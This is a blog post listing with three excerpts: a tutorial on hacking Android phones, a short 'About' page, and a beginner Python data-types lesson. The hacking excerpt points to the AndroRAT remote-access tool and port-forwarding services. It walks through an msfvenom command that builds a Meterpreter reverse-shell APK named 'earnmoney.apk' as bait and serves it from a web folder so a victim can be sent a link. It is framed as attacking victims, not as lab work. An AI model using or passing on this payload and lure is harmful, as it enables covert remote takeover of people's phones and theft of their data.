Posts

Hacking android

Image
Hacking Android via AndroRat tool and make port forwarding  for clear explanation watch my youtube video hacking android phone AndroRat   follow the video for the clear explanation and here are the links i have been used port:  https://portmap.io   git hub link:  https://github.com/karma9874/AndroRAT mail:  https://temp-mail.org/en/ post2:-  Android Hacking with Metasploit Frame work In this post you be learning about how to hack a android mobile by sending a link to the victim firstly start you  kali  machine open  metasploit framework  once after opening the metasploit console type the following command  "here you will be creating the apk to hack the victim phone" so follow the commands "msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 R> /var/www/html/earnmoney.apk " *in place of 0.0.0.0 [enter you system ip address] *lport anything *-p is payload  make sure you execute the command with super us...

About the blog

 About This blog Hey guys!!!  i have made this blog because it will be help full for the upcoming students NEP policy(national educational policy) most of the college doesn't provide the content and they face difficulties so this blog will help you out and also i will be posting "Cyber Security" content Hacking , Android Hacking ,  and technology content  for more post click the below link for furture updates Channel

Python Programming

Image
 Python Programming  Introduction to python programming Python is a high-level, interpreted programming language known for its simplicity and versatility. It is widely used in various fields, from web development to data science, machine learning, automation, and more. This introduction will cover the basics of Python programming, including its features, installation, and core concepts. Program 1: write  a python program to demonstrate basic data types in python (here we have many other data types) sol:                  print ( "----int----" ) print ( "possible integer values" ) print ( 15 ) print (- 25 ) print ( 0o 15 ) print ( 0x 12a ) x = 2 x = int ( 2 ) print ( x ) print ( int ( 25.5 )) print ( int ( "25" )) print ( "operations on integers" ) print ( "arithmetic operatons" ) print ( 2 ** 3 ) print ( 2 * 3 ) print ( 20 / 3 ) print ( 10 // 3 ) print ( 10 + 3 ) print ( 10 - 3 ) print ( "mathematical function" ) print ( pow ( ...